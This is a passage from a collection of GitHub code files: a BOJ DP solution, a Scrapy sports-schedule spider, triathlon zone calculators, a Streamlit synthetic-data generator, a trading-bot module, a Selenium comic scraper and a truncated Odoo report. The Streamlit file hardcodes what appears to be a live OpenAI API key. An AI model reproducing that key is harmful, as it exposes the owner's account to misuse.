FindingElementByXpath()\nfindingbyXpath.locate_by_Xpath()","repo_name":"JanviJaiswani/Python_Notes","sub_path":"Python_selenium/LearningSelenium/6sep/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19779350022","text":"# https://www.acmicpc.net/problem/2096\n# 내려가기\n# 메모리 제한이 있음. 데이터들 저장해두지 않고 그때 그때 처리\nfrom sys import stdin\n\nn = int(stdin.readline())\n\n# 맨 첫 줄만 읽어서 정보 저장\nprev_max = list(map(int, stdin.readline().split()))\nprev_min = prev_max.copy()\n\n# 최대, 최소 값 dp 배열\ndp_max, dp_min = prev_max.copy(), prev_min.copy()\n\nfor i in range(1, n):\n # 한 줄씩 읽으면서 dp 배열 갱신\n a, b, c = map(int, stdin.readline().split())\n\n dp_max[0] = max(prev_max[0], prev_max[1]) + a\n dp_max[1] = max(prev_max) + b\n dp_max[2] = max(prev_max[1], prev_max[2]) + c\n\n dp_min[0] = min(prev_min[0], prev_min[1]) + a\n dp_min[1] = min(prev_min) + b\n dp_min[2] = min(prev_min[1], prev_min[2]) + c\n\n prev_max = dp_max.copy()\n prev_min = dp_min.copy()\n\nprint(max(dp_max), min(dp_min))\n","repo_name":"YAEJIN-JEONG/Algorithm","sub_path":"백준/boj2096/경진/boj2096.py","file_name":"boj2096.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"70085323612","text":"import scrapy\nfrom geopy.geocoders import Nominatim\n\nclass SportSpider(scrapy.Spider):\n name = \"sport\"\n start_urls = [\n 'http://tornades.org/horaire-novice-masculin-a/'\n ]\n\n #Default method that framework will seek\n def parse(self, response):\n table = response.css(\"#content > div.entry-content > table:nth-child(1)\")\n body = table.css(\"tbody\")\n ctn = body.css(\"tr\")\n dataList = ctn.css(\"tr\")\n dataList.pop(0) #remove table headers\n for data in dataList:\n infoNode = data.css(\"td\")\n\n latitude = None\n longitude = None\n Address = self.parseMapsLink(infoNode[6].css(\"a::attr(href)\").get())\n if Address is not None:\n geolocator = Nominatim(user_agent=\"sportscraper\")\n location = geolocator.geocode(Address)\n if location is not None:\n latitude = str(location.raw[\"lat\"])\n longitude = str(location.raw[\"lon\"])\n\n yield {\n 'Event date': self.parseNode((infoNode[0].get())),\n 'Time': self.parseNode((infoNode[1].get())),\n 'Local team': self.parseNode((infoNode[2].get())),\n 'Points Local': self.parseNode((infoNode[3].get())),\n 'Visitor Team': self.parseNode((infoNode[4].get())),\n 'Points Visitors': self.parseNode((infoNode[5].get())),\n 'Location Name': self.parseNode((infoNode[6].get())),\n 'Location Address': Address,\n 'Latitude': latitude,\n 'Longitude': longitude,\n 'Google Maps Link': infoNode[6].css(\"a::attr(href)\").get(),\n }\n\n #Method added to parse text content retrieved (remove tags).\n def parseNode(self, strNode):\n index = strNode.find(\"<\")\n index2 = strNode.find(\">\")\n\n if index == -1:\n return strNode\n else:\n strNodeFixed = strNode[0:index] + strNode[index2+1:]\n return self.parseNode(strNodeFixed)\n\n def parseMapsLink(self, link):\n if link is not None:\n index = link.find(\"place/\")\n\n if index == -1:\n return None\n else:\n addressTemp = link[index+6:]\n index2 = addressTemp.find(\"/\")\n addressTemp = addressTemp[:index2]\n address = addressTemp.replace(\"+\", \" \")\n index3 = self.findKey(address, \",\", 1)#address.find(\",\")\n if index3 == -1:\n return self.handleSpecChar(address)\n else:\n address = address[:index3]\n return self.handleSpecChar(address)\n else:\n return None\n\n def handleSpecChar(self, address):\n\n index = address.find(\"%C3%\")\n\n if index == -1:\n return address\n else:\n address = address[:index] + \"e\" + address[index+6:]\n return address\n\n def findKey(self, haystack, needle, n):\n parts = haystack.split(needle, n + 1)\n if len(parts) <= n + 1:\n return -1\n return len(haystack) - len(parts[-1]) - len(needle)\n","repo_name":"alexisfranche/sportscraper","sub_path":"sportscraper/spiders/sport_spider.py","file_name":"sport_spider.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17674895857","text":"import csv\nimport time\n\ntpace = []\n# Threshold Pace\nlthr = []\n# Lactate Threshold Heart Rate\ncss = []\n# Critical Swim Speed\nftp = []\n# Functional Threshold Power\nlthr_bike = []\n# Bike specific Lactate Threshold Heart Rate\n\n\n\"\"\"GENERAL\"\"\"\n\n\ndef read_convert_time_to_seconds(in_file_name, in_time_column_name, time_list, in_hr_column_name=None, hr_list=None):\n with open(in_file_name) as file_csv:\n reader = csv.DictReader(file_csv, delimiter=',')\n for line in reader:\n out_time_value = str(line[in_time_column_name])\n # https://gist.github.com/bcooksey/90fc3409ca63c652dcfd9769b7cd0314\n hours_in, minutes_in, seconds_in = out_time_value.split(':')\n out_time_value = (int(hours_in)*3600) + (int(minutes_in)*60) + int(seconds_in)\n time_list.append(out_time_value)\n\n if in_hr_column_name is not None and hr_list is not None:\n out_hr_value = int(line[in_hr_column_name])\n hr_list.append(out_hr_value)\n\n\ndef read_power_hr(in_file_name, in_power_column_name, in_power_list, in_hr_column_name, hr_list):\n with open(in_file_name) as file_csv:\n reader = csv.DictReader(file_csv, delimiter=',')\n for line in reader:\n out_time_value = int(line[in_power_column_name])\n in_power_list.append(out_time_value)\n\n out_hr_value = int(line[in_hr_column_name])\n hr_list.append(out_hr_value)\n\n\ndef convert_seconds_in_formatted_str(sec):\n # https://www.askpython.com/python/examples/convert-seconds-hours-minutes\n ty_res = time.gmtime(sec)\n res = time.strftime(\"%H:%M:%S\", ty_res)\n return res\n\n\n\"\"\"PREDICTION METHODS\"\"\"\n\n\ndef prediction_pace_hr(writer, race, distance, pace, pace_ratio, heart_rate=None, hr_ratio=None):\n target_pace = convert_seconds_in_formatted_str(pace / pace_ratio)\n target_time = convert_seconds_in_formatted_str(pace * distance / pace_ratio)\n distance_km = [race, target_pace, target_time]\n if heart_rate is not None and hr_ratio is not None:\n target_hr = int(heart_rate*hr_ratio)\n distance_km.append(target_hr)\n\n writer.writerow(distance_km)\n\n\ndef prediction_power_hr(writer, race, power, power_ratio, heart_rate, hr_ratio):\n target_power = int(power * power_ratio)\n target_hr = int(heart_rate*hr_ratio)\n output = [race, target_power, target_hr]\n writer.writerow(output)\n\n\n\"\"\"ZONES METHODS\"\"\"\n\n\ndef zone_pace_hr(writer, zone, pace, pace_ratio, heart_rate=None, hr_ratio=None):\n target_pace = convert_seconds_in_formatted_str(pace / pace_ratio)\n output = [zone, target_pace]\n if heart_rate is not None and hr_ratio is not None:\n target_hr = int(heart_rate*hr_ratio)\n output.append(target_hr)\n\n writer.writerow(output)\n\n\ndef zone_power_hr(writer, zone, power, power_ratio, heart_rate, hr_ratio):\n target_power = int(power * power_ratio)\n target_hr = int(heart_rate * hr_ratio)\n output = [zone, target_power, target_hr]\n\n writer.writerow(output)\n\n\n\"\"\" SWIM \"\"\"\n# Swim predictions\n\n\ndef swim_predictions():\n read_convert_time_to_seconds('01 - Swim Entry.csv', 'CSS', css)\n header_swim_predictions = [\"Distance\", \"Pace/100m\", \"Time\"]\n with open('Swim predictions.csv', 'w', newline='') as file_output_csv:\n writer = csv.writer(file_output_csv, delimiter=',')\n writer.writerow(header_swim_predictions)\n\n prediction_pace_hr(writer, \"XS - 400m\", 4, css[0], 1)\n prediction_pace_hr(writer, \"S - 750m\", 7.5, css[0], 0.96)\n prediction_pace_hr(writer, \"M - 1500m\", 15, css[0], 0.93)\n prediction_pace_hr(writer, \"L - 1900m\", 19, css[0], 0.90)\n prediction_pace_hr(writer, \"XL - 3800m\", 38, css[0], 0.85)\n\n\n# Swim zones\ndef swim_zones():\n read_convert_time_to_seconds('01 - Swim Entry.csv', 'CSS', css)\n header_swim_zones = [\"Zone\", \"Pace\"]\n with open('Swim zones.csv', 'w', newline='') as file_output_csv:\n writer = csv.writer(file_output_csv, delimiter=',')\n writer.writerow(header_swim_zones)\n\n zone_pace_hr(writer, \"i1\", css[0], 0.72)\n zone_pace_hr(writer, \"i2\", css[0], 0.76)\n zone_pace_hr(writer, \"i3-\", css[0], 0.88)\n zone_pace_hr(writer, \"i3\", css[0], 0.93)\n zone_pace_hr(writer, \"i3+\", css[0], 0.96)\n zone_pace_hr(writer, \"i4-\", css[0], 1)\n zone_pace_hr(writer, \"i4+\", css[0], 1.03)\n zone_pace_hr(writer, \"i5\", css[0], 1.10)\n zone_pace_hr(writer, \"i6\", css[0], 1.15)\n\n\n\"\"\" BIKE \"\"\"\n# Bike predictions\n\n\ndef bike_predictions():\n read_power_hr('02 - Bike Entry.csv', 'FTP', ftp, 'LTHR', lthr_bike)\n header_bike_predictions = [\"Distance\", \"Target Power\", \"Target HR\"]\n with open('Bike predictions.csv', 'w', newline='') as file_output_csv:\n writer = csv.writer(file_output_csv, delimiter=',')\n writer.writerow(header_bike_predictions)\n\n prediction_power_hr(writer, \"XS - 10km\", ftp[0], 1.05, lthr_bike[0], 1.03)\n prediction_power_hr(writer, \"S - 20km\", ftp[0], 1, lthr_bike[0], 1)\n prediction_power_hr(writer, \"M - 40km\", ftp[0], 0.93, lthr_bike[0], 0.96)\n prediction_power_hr(writer, \"L - 90km\", ftp[0], 0.85, lthr_bike[0], 0.90)\n prediction_power_hr(writer, \"XL - 180km\", ftp[0], 0.75, lthr_bike[0], 0.85)\n\n\n# Bike zones\ndef bike_zones():\n read_power_hr('02 - Bike Entry.csv', 'FTP', ftp, 'LTHR', lthr_bike)\n header_bike_zones = [\"Zone\", \"Target Power\", \"Target HR\"]\n with open('Bike zones.csv', 'w', newline='') as file_output_csv:\n writer = csv.writer(file_output_csv, delimiter=',')\n writer.writerow(header_bike_zones)\n\n zone_power_hr(writer, \"i1\", ftp[0], 0.50, lthr_bike[0], 0.60)\n zone_power_hr(writer, \"i2\", ftp[0], 0.65, lthr_bike[0], 0.75)\n zone_power_hr(writer, \"i3-\", ftp[0], 0.75, lthr_bike[0], 0.85)\n zone_power_hr(writer, \"i3\", ftp[0], 0.85, lthr_bike[0], 0.90)\n zone_power_hr(writer, \"i3+\", ftp[0], 0.93, lthr_bike[0], 0.96)\n zone_power_hr(writer, \"i4-\", ftp[0], 1, lthr_bike[0], 1)\n zone_power_hr(writer, \"i4+\", ftp[0], 1.05, lthr_bike[0], 1.03)\n zone_power_hr(writer, \"i5\", ftp[0], 1.23, lthr_bike[0], 1.05)\n zone_power_hr(writer, \"i6\", ftp[0], 1.35, lthr_bike[0], 1.07)\n\n\n\"\"\" RUN \"\"\"\n# Run predictions\n\n\ndef run_predictions():\n read_convert_time_to_seconds('03 - Run Entry.csv', 'Threshold pace', tpace, 'LTHR', lthr)\n header_run_predictions = [\"Distance\", \"Pace\", \"Time\", \"Target HR\"]\n with open('Run predictions.csv', 'w', newline='') as file_output_csv:\n writer = csv.writer(file_output_csv, delimiter=',')\n writer.writerow(header_run_predictions)\n\n prediction_pace_hr(writer, \"5 km\", 5, tpace[0], 1.04, lthr[0], 1.02)\n prediction_pace_hr(writer, \"10 km\", 10, tpace[0], 1, lthr[0], 1)\n prediction_pace_hr(writer, \"Half Marathon\", 21.095, tpace[0], 0.94, lthr[0], 0.96)\n prediction_pace_hr(writer, \"Marathon\", 42.195, tpace[0], 0.90, lthr[0], 0.93)\n\n\n# Run zones\ndef run_zones():\n read_convert_time_to_seconds('03 - Run Entry.csv', 'Threshold pace', tpace, 'LTHR', lthr)\n header_run_zones = [\"Zone\", \"Target pace\", \"Target HR\"]\n with open('Run zones.csv', 'w', newline='') as file_output_csv:\n writer = csv.writer(file_output_csv, delimiter=',')\n writer.writerow(header_run_zones)\n\n zone_pace_hr(writer, \"i1\", tpace[0], 0.60, lthr[0], 0.71)\n zone_pace_hr(writer, \"i2\", tpace[0], 0.65, lthr[0], 0.78)\n zone_pace_hr(writer, \"i3-\", tpace[0], 0.87, lthr[0], 0.89)\n zone_pace_hr(writer, \"i3\", tpace[0], 0.91, lthr[0], 0.94)\n zone_pace_hr(writer, \"i3+\", tpace[0], 0.94, lthr[0], 0.97)\n zone_pace_hr(writer, \"i4-\", tpace[0], 1, lthr[0], 1)\n zone_pace_hr(writer, \"i4+\", tpace[0], 1.03, lthr[0], 1.02)\n zone_pace_hr(writer, \"i5\", tpace[0], 1.10, lthr[0], 1.04)\n zone_pace_hr(writer, \"i6\", tpace[0], 1.15, lthr[0], 1.07)\n\n\n\"\"\"MENUS\"\"\"\n\n\ndef menu_main():\n menu = input(\"\\nMain Menu (Type the corresponding number):\\n\"\n \"1. Swim\\n2. Bike\\n3. Run\\n9. Exit program\\n\")\n if menu == \"1\":\n menu_swim()\n\n elif menu == \"2\":\n menu_bike()\n\n elif menu == \"3\":\n menu_run()\n\n elif menu == \"9\":\n exit()\n\n else:\n print(\"This is not a suitable answer.\\n\")\n menu_main()\n\n\ndef menu_swim():\n menu = input(\"\\nYou selected the SWIM section.\\n\\n\"\n \"What would you like to know? (Type the corresponding number):\\n\"\n \"0. Back\\n1. Race predictions\\n2. Training zones\\n9. Exit program\\n\")\n if menu == \"0\":\n menu_main()\n\n elif menu == \"1\":\n swim_predictions()\n print(\"The file 'Swim predictions.csv' is ready.\")\n\n elif menu == \"2\":\n swim_zones()\n print(\"The file 'Swim zones.csv' is ready.\")\n\n elif menu == \"9\":\n exit()\n\n else:\n print(\"This is not a suitable answer.\\n\")\n menu_swim()\n return\n\n menu_main()\n\n\ndef menu_bike():\n menu = input(\"\\nYou selected the BIKE section.\\n\\n\"\n \"What would you like to know? (Type the corresponding number):\\n\"\n \"0. Back\\n1. Race predictions\\n2. Training zones\\n9. Exit program\\n\")\n if menu == \"0\":\n menu_main()\n return\n\n elif menu == \"1\":\n bike_predictions()\n print(\"The file 'Bike predictions.csv' is ready.\")\n\n elif menu == \"2\":\n bike_zones()\n print(\"The file 'Bike zones.csv' is ready.\")\n\n elif menu == \"9\":\n exit()\n\n else:\n print(\"This is not a suitable answer.\\n\")\n menu_bike()\n return\n\n menu_main()\n\n\ndef menu_run():\n menu = input(\"\\nYou selected the RUN section.\\n\\n\"\n \"What would you like to know? (Type the corresponding number):\\n\"\n \"0. Back\\n1. Race predictions\\n2. Training zones\\n9. Exit program\\n\")\n if menu == \"0\":\n menu_main()\n return\n\n elif menu == \"1\":\n run_predictions()\n print(\"The file 'Running predictions.csv' is ready.\")\n\n elif menu == \"2\":\n run_zones()\n print(\"The file 'Running zones.csv' is ready.\")\n\n elif menu == \"9\":\n exit()\n\n else:\n print(\"This is not a suitable answer.\\n\")\n menu_run()\n return\n\n menu_main()\n\n\nmenu_main()\n","repo_name":"GregoireFM/OCRPersonalProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16951170101","text":"import os\r\nimport pickle\r\nimport streamlit as st\r\nimport tempfile\r\nimport pandas as pd\r\nimport asyncio\r\nfrom io import StringIO\r\nimport csv\r\n#from dotenv import load_dotenv\r\n\r\n# Import modules needed for building the chatbot application\r\nfrom streamlit_chat import message\r\n# from langchain.embeddings.openai import OpenAIEmbeddings\r\n# from langchain.chat_models import ChatOpenAI\r\n# from langchain.chains import ConversationalRetrievalChain\r\n# from langchain.document_loaders.csv_loader import CSVLoader\r\n# from langchain.vectorstores import FAISS\r\n\r\nimport openai\r\n\r\n# Set the Streamlit page configuration, including the layout and page title/icon\r\nst.set_page_config(layout=\"wide\", page_icon=\"💬\", page_title=\"Synthetic Scenario Generator\")\r\n\r\n# Display the header for the application using HTML markdown\r\nst.markdown(\r\n \"

Synthetic Generator 💬

\",\r\n unsafe_allow_html=True)\r\n\r\n# Load API key from .env file\r\n#load_dotenv()\r\n#user_api_key = os.getenv(\"OPENAI_API_KEY\")\r\nuser_api_key = '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'\r\nopenai.api_key = user_api_key\r\n\r\n# Allow the user to upload a CSV file\r\nuploaded_file = st.sidebar.file_uploader(\"upload\", type=\"csv\", label_visibility=\"hidden\")\r\n\r\n# Allow the user to provide the number of records to be generated\r\nuser_no_of_records_needed = st.sidebar.text_input(label=\"#### Provide the number of records to be generated 👇\",\r\n placeholder=\"For example: 10 records\",\r\n type=\"default\")\r\n\r\nasync def main():\r\n \r\n # Check if the user has entered an OpenAI API key\r\n if user_api_key == \"\":\r\n \r\n # Display a message asking the user to enter their API key\r\n st.markdown(\r\n \"

Enter your OpenAI API key to start chatting 😉

\",\r\n unsafe_allow_html=True)\r\n \r\n else:\r\n # Set the OpenAI API key as an environment variable\r\n os.environ[\"OPENAI_API_KEY\"] = user_api_key\r\n \r\n # If the user has uploaded a file, display it in an expander\r\n if uploaded_file is not None:\r\n def show_user_file(uploaded_file):\r\n file_container = st.expander(\"Your CSV file :\")\r\n shows = pd.read_csv(uploaded_file)\r\n uploaded_file.seek(0)\r\n file_container.write(shows)\r\n \r\n show_user_file(uploaded_file)\r\n \r\n # If the user has not uploaded a file, display a message asking them to do so\r\n else :\r\n st.sidebar.info(\r\n \"👆 Upload your CSV file to get started, \"\r\n \"sample for try : [fishfry-locations.csv](https://drive.google.com/file/d/18i7tN2CqrmoouaSqm3hDfAk17hmWx94e/view?usp=sharing)\" \r\n )\r\n \r\n if uploaded_file is not None and user_no_of_records_needed != \"\":\r\n # Convert uploaded file into a pandas dataframe\r\n input_csv = pd.read_csv(uploaded_file)\r\n\r\n # Extract column names and data types from the sample table\r\n columns = input_csv.columns.tolist()\r\n data_types = input_csv.dtypes.tolist()\r\n\r\n # Convert the input csv table into string format for input prompt\r\n data = input_csv.to_string(index=False)\r\n \r\n # Prepare your input prompt\r\n input_prompt = f\"\"\"\r\n Generate synthetic data for a table with the following columns: {columns}. The data types are: {data_types}.\r\n Use the following data as a sample table:\r\n\r\n {data}\r\n \"\"\"\r\n # Define the API call parameters\r\n prompt = f\"{input_prompt}\\n\\nGenerate synthetic data of {user_no_of_records_needed} new records in comma separarted csv format along with columns names from the above table using the above table as reference. Do not display the records from the sample table in the synthetic data results.\"\r\n\r\n\r\n print(\"Printing input prompt\", prompt)\r\n\r\n print(\"Check 3\")\r\n #Generate response using OpenAI API\r\n # response = openai.Completion.create(\r\n # model=\"text-davinci-003\",\r\n # prompt=prompt\r\n # )\r\n response = openai.Completion.create(\r\n engine=\"text-davinci-002\",\r\n prompt=prompt,\r\n max_tokens = 3000,\r\n n = 1\r\n )\r\n \r\n api_string = response['choices'][0]['text']\r\n synthetic_df = pd.read_csv(StringIO(api_string), sep=\",\")\r\n\r\n print(\"Check 4\")\r\n # print(synthetic_df)\r\n #Show the response in the web page\r\n \r\n # st.write('Length of input csv uploaded', len(input_csv))\r\n # st.write('Input prompt \\n', input_prompt)\r\n st.write('API response \\n',api_string)\r\n st.write('Output response from ChatGPT',synthetic_df)\r\n print(\"Printing final output table column names \\n\", synthetic_df.columns)\r\n\r\n # Download your results as a CSV file\r\n csv = synthetic_df.to_csv().encode('utf-8')\r\n st.download_button(\r\n label=\"Download data as CSV\",\r\n data=csv,\r\n file_name='download_test_file.csv',\r\n mime='text/csv',\r\n )\r\n\r\n else:\r\n st.write(\"Upload a sample CSV and provide the number of records to be generated as input\")\r\n\r\n print(\"Check 5\")\r\n # Create an expander for the \"About\" section\r\n about = st.sidebar.expander(\"About 🤖\")\r\n \r\n # Write information about the chatbot in the \"About\" section\r\n about.write(\"#### ChatBot-CSV is an AI chatbot featuring conversational memory, designed to enable users to discuss their CSV data in a more intuitive manner. 📄\")\r\n about.write(\"#### He employs large language models to provide users with seamless, context-aware natural language interactions for a better understanding of their CSV data. 🌐\")\r\n about.write(\"#### Powered by [Langchain](https://github.com/hwchase17/langchain), [OpenAI](https://platform.openai.com/docs/models/gpt-3-5) and [Streamlit](https://github.com/streamlit/streamlit) ⚡\")\r\n about.write(\"#### Source code : [yvann-hub/ChatBot-CSV](https://github.com/yvann-hub/ChatBot-CSV)\")\r\n\r\n#Run the main function using asyncio\r\nif __name__ == \"__main__\":\r\n asyncio.run(main())\r\n\r\n","repo_name":"lokiguna96/SynthAI","sub_path":"app_output_csv_trial_25Apr.py","file_name":"app_output_csv_trial_25Apr.py","file_ext":"py","file_size_in_byte":6319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70888152730","text":"import time, queue\nfrom enum import Enum\nimport pandas as pd\nfrom pathlib import Path\nfrom dataclasses import dataclass\ntry:\n from element_types import Record, Function, ProcCMD, GuiCMD, ListPersist\nexcept ImportError: \n from Pythonic.element_types import Record, Function, ProcCMD, GuiCMD, ListPersist\n\n\n@dataclass\nclass OrderRecord:\n orderType: bool # True = Buy, False = Sell\n price: float # close price\n profit: float # profit in percent\n profitCumulative: float # cumulative profit in percent\n\n\nclass OrderType(Enum): \n Buy = True\n Sell = False\n\n\nclass Element(Function):\n\n def __init__(self, id, config, inputData, return_queue, cmd_queue):\n super().__init__(id, config, inputData, return_queue, cmd_queue)\n\n def execute(self):\n\n ### Load data ###\n\n file_path = Path.home() / 'Pythonic' / 'executables' / 'ADAUSD_5m.df'\n\n # only the last 21 columsn are considered\n self.ohlcv = pd.read_pickle(file_path)[-21:]\n\n self.bBought = False\n self.lastPrice = 0.0\n self.profit = 0.0\n self.profitCumulative = 0.0 \n self.price = self.ohlcv['close'].iloc[-1]\n \n # switches for simulation\n\n self.bForceBuy = False\n self.bForceSell = False\n \n\n # load trade history from file\n self.trackRecord = ListPersist('track_record')\n\n try:\n lastOrder = self.trackRecord[-1]\n\n self.bBought = lastOrder.orderType\n self.lastPrice = lastOrder.price\n self.profitCumulative = lastOrder.profitCumulative\n\n except IndexError:\n pass\n \n ### Calculate indicators ###\n\n self.ohlcv['ema-10'] = self.ohlcv['close'].ewm(span = 10, adjust=False).mean()\n self.ohlcv['ema-21'] = self.ohlcv['close'].ewm(span = 21, adjust=False).mean()\n self.ohlcv['condition'] = self.ohlcv['ema-10'] > self.ohlcv['ema-21']\n \n ### Check for Buy- / Sell-condition ###\n tradeCondition = self.ohlcv['condition'].iloc[-1] != self.ohlcv['condition'].iloc[-2]\n\n if tradeCondition or self.bForceBuy or self.bForceSell:\n\n orderType = self.ohlcv['condition'].iloc[-1] # True = BUY, False = SELL\n\n if orderType and not self.bBought or self.bForceBuy: # place a buy order\n \n msg = 'Placing a Buy-order'\n newOrder = self.createOrder(True)\n\n elif not orderType and self.bBought or self.bForceSell: # place a sell order\n\n msg = 'Placing a Sell-order'\n\n sellPrice = self.price\n buyPrice = self.lastPrice\n\n self.profit = (sellPrice * 100) / buyPrice - 100\n self.profitCumulative += self.profit\n\n newOrder = self.createOrder(False)\n\n else: # Something went wrong\n msg = 'Warning: Condition for {}-order met but bBought is {}'.format(\n OrderType(orderType).name, self.bBought)\n\n newOrder = None\n \n\n recordDone = Record(newOrder, msg) \n self.return_queue.put(recordDone)\n\n\n def createOrder(self, orderType: bool) -> OrderRecord:\n \n newOrder = OrderRecord(\n orderType=orderType,\n price=self.price,\n profit=self.profit,\n profitCumulative=self.profitCumulative\n )\n \n self.trackRecord.append(newOrder)\n\n return newOrder","repo_name":"hANSIc99/Pythonic","sub_path":"examples/trading_bot_crossing_ema/generic_pipe_29dfc189.py","file_name":"generic_pipe_29dfc189.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":382,"dataset":"github-code","pt":"32"} +{"seq_id":"74882165210","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport re\nimport sys\nimport time\nimport random\n\nimport requests as req\nfrom tqdm import tqdm\nfrom bs4 import BeautifulSoup as bsoup\nfrom urllib.parse import urlparse\n\nimport cloudscraper\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nimport helpers\nfrom variant import Variant\n\nfrom sweepers.interface import SweeperInterface\n\n\nclass SweeperGR(SweeperInterface):\n \"\"\"\n Sweeper can collect chapters, scrape chapter URL and get images\n All will be archived in a temp dir named: archives\n \"\"\"\n\n def __init__(self, main_url, dry_run, filters, reverse, use_proxies=True):\n \"\"\"Initialize the Collector object\n :param main_url: The URL from which to collect chapters and other info\n :param dry_run: Will only print and not download\n :return: None\n \"\"\"\n super().__init__(main_url, dry_run, filters, reverse=reverse)\n\n temp = urlparse(self.main_url)\n self.base_url = str(self.main_url).replace(temp.path, \"\")\n self.proxy_helper = helpers.HelperProxy()\n self.reverse = reverse\n self.use_proxies = use_proxies\n options = webdriver.ChromeOptions()\n options.add_argument(\"--headless\")\n options.add_argument(\"--incognito\")\n options.add_argument(\"--disable-extensions\")\n self.scraper = webdriver.Chrome(options=options)\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.scraper.close()\n self.scraper.quit()\n\n def sweep(self):\n \"\"\"Collect all chapters and images from chapters\n :return: None\n \"\"\"\n self.announce_url()\n self.sweep_collection()\n self.sweep_chapters()\n\n def get_page(self, url):\n response = None\n for i in range(self.RETRY):\n print(\"### Trying out URL:\", url)\n try:\n self.scraper.get(url)\n time.sleep(random.uniform(1, 3))\n response = self.scraper.execute_script(\n \"return document.getElementsByTagName('html')[0].innerHTML\"\n )\n except Exception as e:\n helpers.print_error(e)\n continue\n break\n\n if response is None or response == \"\":\n raise ConnectionError(\"Not able to reach url!\")\n return bsoup(response, \"html.parser\")\n\n def sweep_collection(self) -> None:\n name = None\n html_soup = None\n timeout = self.RETRY / 5\n for i in range(self.RETRY):\n html_soup = self.get_page(self.main_url)\n print(\"# Finding collection name ...\")\n name = html_soup.find(\"div\", class_=\"top-texts ng-star-inserted\")\n if name is None:\n print(\"# Information not found. Retrying...\")\n time.sleep(random.uniform(1, 3))\n if i % timeout == 0:\n self.clean_scraper()\n continue\n break\n\n if name is None:\n # if name is still not found, retry\n self.clean_scraper()\n self.sweep_collection()\n\n self.name = str(name.h1.contents[0]).strip()\n print(\"## Name:\", self.name)\n\n print(\"# Finding chapters ...\")\n container = html_soup.find(\"div\", class_=\"left-side ng-star-inserted\")\n chapters = container.findAll(\n \"a\", class_=\"issue-title ng-star-inserted\", recursive=True, href=True\n )\n for chapter in chapters:\n chapter_url = str(chapter[\"href\"]).strip()\n chapter_url = self.base_url + chapter_url\n chapter_name = str(chapter.contents[0]).strip()\n if chapter_name not in self.chapters:\n print(\"## Chapter: \", chapter_name, \" - \", chapter_url)\n self.chapters[chapter_name] = chapter_url\n\n self.filter_chapters()\n print(\"=\" * 75)\n\n def sweep_chapters(self):\n time.sleep(5)\n print(\"# Chapters info: \")\n # visit urls and collect img urls\n for name, url in tqdm(self.chapters.items(), desc=\"## Collecting\"):\n self.try_sweep_chapter(url, name)\n\n # print chapter info\n for chapter, imgs in self.chapter_imgs.items():\n print(\"## {0}: {1} pages\".format(chapter, len(imgs)))\n\n def try_sweep_chapter(self, url, name):\n for i in range(self.RETRY):\n try:\n time.sleep(random.uniform(5, 10))\n self.sweep_chapter(url, name)\n except TimeoutError as e:\n helpers.print_error(e)\n continue\n except LookupError as e:\n helpers.print_error(e)\n print(\"# Resetting everything and retrying...\")\n self.clean_scraper()\n continue\n break\n\n def sweep_chapter(self, url, chapter_name) -> None:\n # get contents from html\n html_soup = self.get_page(url)\n container = html_soup.find(\"div\", class_=\"slides-container ads\")\n all_pages = container.findChildren(\n \"div\", class_=\"page-container ng-star-inserted\"\n )\n # scroll controller\n for i, page in enumerate(\n tqdm(all_pages, desc=\"### Gathering images\", ascii=True)\n ):\n # move to the page so that the javascript can load target\n element_id = \"page_\" + str(i)\n self._scroll_to_element_by_id(element_id)\n # start gathering\n new_img = None\n for x in range(100):\n # get new version after scroll\n response = self.scraper.execute_script(\n \"return document.getElementById('{0}').innerHTML\".format(element_id)\n )\n new_page = bsoup(response, \"html.parser\")\n # get image element\n new_img = new_page.find(\"img\")\n # print(\"NEW IMG:\", new_img)\n if new_img is not None:\n break\n # re-scroll\n if x % 10 == 0 and x != 0:\n self._scroll_to_element_by_id(\"page_0\")\n self._scroll_to_element_by_id(element_id)\n # wait for load to finish\n time.sleep(random.uniform(0.5, 1))\n\n img_src = new_img[\"src\"].replace(\"thumbnail\", \"image\")\n if chapter_name not in self.chapter_imgs:\n self.chapter_imgs[chapter_name] = []\n img_elem = (str(i + 1) + \".jpg\", img_src)\n self.chapter_imgs[chapter_name].append(img_elem)\n\n def _scroll_to_element_by_id(self, element_id):\n element = self.scraper.find_element_by_id(element_id)\n # actions way\n actions = webdriver.ActionChains(self.scraper)\n actions.move_to_element(element).perform()\n # other way\n # self.scraper.execute_script('arguments[0].scrollIntoView(true);', element)\n # scroll_position = self.scraper.execute_script('return window.pageYOffset;')\n time.sleep(2)\n\n def clean_scraper(self):\n print(\"### Something went wrong. Cleaning scraper...\")\n self.scraper.quit()\n options = webdriver.ChromeOptions()\n options.add_argument(\"--headless\")\n self.scraper = webdriver.Chrome(options=options)\n","repo_name":"custompointofview/py-comix","sub_path":"sweepers/sweeper_gr.py","file_name":"sweeper_gr.py","file_ext":"py","file_size_in_byte":7332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72190322331","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, models, tools\nimport datetime\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, pycompat, misc\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass ProductSaleByCountReport(models.Model):\n _name = \"report.sales.by.count\"\n _auto = False\n\n sku_code = fields.Char('Product SKU')\n product_tmpl_id = fields.Many2one('product.template', \"Product\")\n product_uom = fields.Char(string=\"UOM\")\n quantity = fields.Integer(string='Quantity')\n\n @api.model_cr\n def init(self):\n self.init_table()\n\n def 